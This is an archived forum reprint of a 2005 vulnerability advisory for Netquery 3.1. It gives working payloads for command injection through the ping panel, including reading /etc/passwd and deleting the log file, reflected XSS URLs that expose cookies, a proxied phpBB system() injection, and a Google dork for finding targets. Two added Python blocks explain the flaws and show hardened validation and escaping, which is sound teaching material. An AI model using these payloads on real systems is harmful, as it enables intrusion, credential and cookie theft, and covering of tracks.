EvilOctal (邪恶八进制) Information Security Team Technical Discussion Group's Archiver

EvilOctal 2005-7-23 20:03

[Reprint] Netquery 3.1 remote command execution, cross-site scripting and information disclosure vulnerabilities

Article author: rgod[at]autistici.org

Netquery 3.1 remote commands execution, cross site scripting, information disclosure poc exploit

software:
author site: [url]http://www.virtech.org/tools/[/url]

a user can execute commands on the target system through the PING panel, if it is enabled (which is often the case), by placing a pipe character in the
"Ping IP Address or Host Name" input text box. Examples:

| cat /etc/passwd

shows the contents of /etc/passwd in plain text

| pwd

shows the current path

| rm [pwd_output]/logs/nq_log.txt

deletes the log file...
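The pipe trick above works because the panel concatenates the submitted host into a shell command line, so "| cat /etc/passwd" turns one ping command into a two-stage pipeline: ping fails on the empty argument and cat (which ignores stdin once it has a file argument) prints the file. The following is an added example, written in Python rather than the application's own code, that is not part of the original advisory and not Netquery's source. It assumes a hypothetical ping handler that builds "ping -c 3 <input>" as a string, shows what the shell would make of the advisory's payload, and contrasts it with an allowlist validator plus an argv list that never touches a shell:

```python
import ipaddress
import re
import shlex
from typing import List

# RFC 1123 hostname: dot-separated labels of letters, digits and inner hyphens.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^(?:{_LABEL}\.)*{_LABEL}\.?$")


def is_valid_ping_target(target: str) -> bool:
    """Allowlist check: an IPv4/IPv6 literal or an RFC 1123 hostname, nothing else.
    Shell metacharacters such as | ; $ ( ) and whitespace can never pass."""
    if not target or len(target) > 253:
        return False
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        pass
    return _HOSTNAME_RE.fullmatch(target) is not None


def vulnerable_ping_command(target: str) -> str:
    """The pattern the advisory describes (assumed, not Netquery's actual code):
    user input concatenated straight into a shell command string."""
    return "ping -c 3 " + target


def pipeline_stages(command: str) -> List[List[str]]:
    """Tokenise a command line the way a POSIX shell would and split it at
    pipeline/list operators, returning one argv per stage. This is how the
    injected pipe turns a single ping into 'ping ...' followed by 'cat ...'."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    stages: List[List[str]] = []
    current: List[str] = []
    for tok in lexer:
        if tok in ("|", "||", "&&", ";", "&"):
            stages.append(current)
            current = []
        else:
            current.append(tok)
    stages.append(current)
    return stages


def safe_ping_argv(target: str) -> List[str]:
    """Hardened form: validate against the allowlist, then return an argv list
    to hand to subprocess.run(argv) (no shell=True), so no shell ever parses
    the user's string. Raises ValueError on anything that is not a host."""
    if not is_valid_ping_target(target):
        raise ValueError(f"refusing to ping {target!r}: not an IP address or hostname")
    return ["ping", "-c", "3", target]


if __name__ == "__main__":
    # Constructed inputs: the advisory's payload and a normal host.
    for user_input in ("| cat /etc/passwd", "8.8.8.8"):
        cmd = vulnerable_ping_command(user_input)
        print(f"{cmd!r} -> stages {pipeline_stages(cmd)}")
        try:
            print("  hardened argv:", safe_ping_argv(user_input))
        except ValueError as exc:
            print("  hardened:", exc)
```

Validation is the primary control here; escaping (escapeshellarg in PHP, shlex.quote in Python) would also stop the pipe, but an allowlist of what a ping target may look like is simpler to reason about and also rejects option injection such as a target beginning with a hyphen.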

disclosure of user activity:
if logging is enabled, a user can view the clear-text log file through the URL:

http://[target]/[path]/logs/nq_log.txt

xss:
http://[target]/[path]/submit.php?portnum="/><script>alert(document.cookie)</script>
http://[target]/[path]/nqgeoip2.php?step=<script>alert(document.cookie)</script>
http://[target]/[path]/nqgeoip2.php?body=<script>alert(document.cookie)</script>
http://[target]/[path]/nqgeoip.php?step=<script>alert(document.cookie)</script>
http://[target]/[path]/nqports.php?step=<script>alert(document.cookie)</script>
http://[target]/[path]/nqports2.php?step=<script>alert(document.cookie)</script>
http://[target]/[path]/nqports2.php?body=<script>alert(document.cookie)</script>
http://[target]/[path]/portlist.php?portnum=<script>alert(document.cookie)</script>
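The first XSS URL above reflects portnum inside an HTML attribute, which is why the payload starts with "/> to close the attribute and the tag before the script element. As an added example (not part of the advisory and not Netquery's code, which is PHP), the Python below renders a hypothetical portnum field the vulnerable way and the escaped way, parses both with the standard library HTML parser to show which tags a browser would actually see, and adds the stricter fix for a field that should only ever hold a port number:

```python
import html
from html.parser import HTMLParser
from typing import List, Optional

# The advisory's payload for submit.php?portnum=... (constructed from the URL above).
PAYLOAD = '"/><script>alert(document.cookie)</script>'


def render_port_input_vulnerable(portnum: str) -> str:
    """Assumed vulnerable pattern: the raw query parameter is interpolated into
    a quoted attribute, so the leading "/> in the payload closes the tag."""
    return f'<input type="text" name="portnum" value="{portnum}"/>'


def render_port_input_fixed(portnum: str) -> str:
    """Context-aware escaping: quote=True also encodes \" and ', which is what
    keeps the value inside the attribute."""
    return f'<input type="text" name="portnum" value="{html.escape(portnum, quote=True)}"/>'


class _TagCollector(HTMLParser):
    """Records every start tag and the attributes of the input element."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: List[str] = []
        self.input_attrs: dict = {}

    def handle_starttag(self, tag: str, attrs) -> None:
        self.tags.append(tag)
        if tag == "input":
            self.input_attrs = dict(attrs)


def start_tags(markup: str) -> List[str]:
    """Tags a browser would create from the markup; a 'script' here means XSS."""
    parser = _TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


def reflected_value(markup: str) -> Optional[str]:
    """The decoded value attribute of the input, or None if there is no input."""
    parser = _TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.input_attrs.get("value")


def parse_port(portnum: str) -> Optional[int]:
    """For a port field, validate the type before rendering or using it:
    anything that is not an integer in 1..65535 is rejected outright."""
    if not portnum.isdigit():
        return None
    n = int(portnum)
    return n if 1 <= n <= 65535 else None


if __name__ == "__main__":
    print("vulnerable:", start_tags(render_port_input_vulnerable(PAYLOAD)))
    print("fixed:     ", start_tags(render_port_input_fixed(PAYLOAD)))
    print("port check:", parse_port(PAYLOAD), parse_port("443"))
```

Escaping is the generic fix for every reflected parameter listed above (step, body, portnum); type validation is the extra layer for the ones with a known shape.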


a user can use on-line Netquery installations as proxy servers
to launch exploits from the HTTP GET request panel, so the request reaches the victim from the Netquery host. Example,
exploiting phpBB 2.0.15:
make a GET request for
http://[vulnerable_server]/[path]/viewtopic.php?t=[existing_topic]&highlight='.system($HTTP_GET_VARS[command]).'&command=cat%20/etc/passwd

googledork: inurl:nquser.php


rgod
email: rgod[at]autistici.org
site: [url]http://rgod.altervista.org[/url]

exploit:
[url]http://www.eviloctal.com/forum/read.php?tid=12775[/url]

© 1999-2008 EvilOctal Security Team